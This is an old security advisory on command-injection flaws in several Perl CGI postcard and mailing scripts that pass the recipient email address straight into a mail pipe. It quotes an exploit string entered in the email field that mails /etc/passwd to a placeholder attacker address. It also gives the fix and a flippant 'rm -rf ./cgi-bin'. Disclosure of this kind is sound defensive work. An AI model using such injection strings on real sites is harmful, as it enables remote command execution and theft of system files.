COMMAND

    CGIs

SYSTEMS AFFECTED

    Systems running CGI scripts mentioned below

PROBLEM

    Following is based  mostly on xnec  post.  After  looking over the
    perl-CGI   scripts   on   www.cgi-resources.com,   he   discovered
    vulnerabilities in the following:

        1. HAMcards Postcard script v1.0 Beta 2
           (www.hamnetcenter.com)
        2. Hot Postal Services v??
           (www.hotarea.com)
           note: the only metacharacter stripping this script does  is
           rejecting any |'s
        3. RC Bowen's Postcards v??
           (www.rcbowen.com)
        4. LakeWeb's File Mail and Mail List (expanded File Mail) v??
           (www.lakeweb.com)

    Each of these are exploitable by inputing metacharacters into  the
    recipient's email  address.   Each script  calls something similar
    to:

        open( MAIL, "|$mailprog $email" )
        # this particular line is from the LakeWeb scripts

    The exploit strings are simple, something like

        &mail evil@foobar.com < /etc/passwd&@host.com

    will  work  for  each  script  (the @host.com is necessary because
    some hosts  check for  "@" and  ".") when  placed in the Recipient
    Email field.   As a result,  any command can  be executed remotely
    without a  local account  with the  uid of  the webserver (usually
    "nobody" or similar, but you never know).

    As  a  related  note,  the  WebCards  program (V1.6) by Sam Kareem
    (webmaster@iraq.net) is subject to the same vunerability (reported
    by Karl Hanmore).

SOLUTION

    Use open  (MAIL ,  "|$sendmail -t")  or use  Net::SMTP to pass the
    data directly to port 25. or simply rm -rf ./cgi-bin.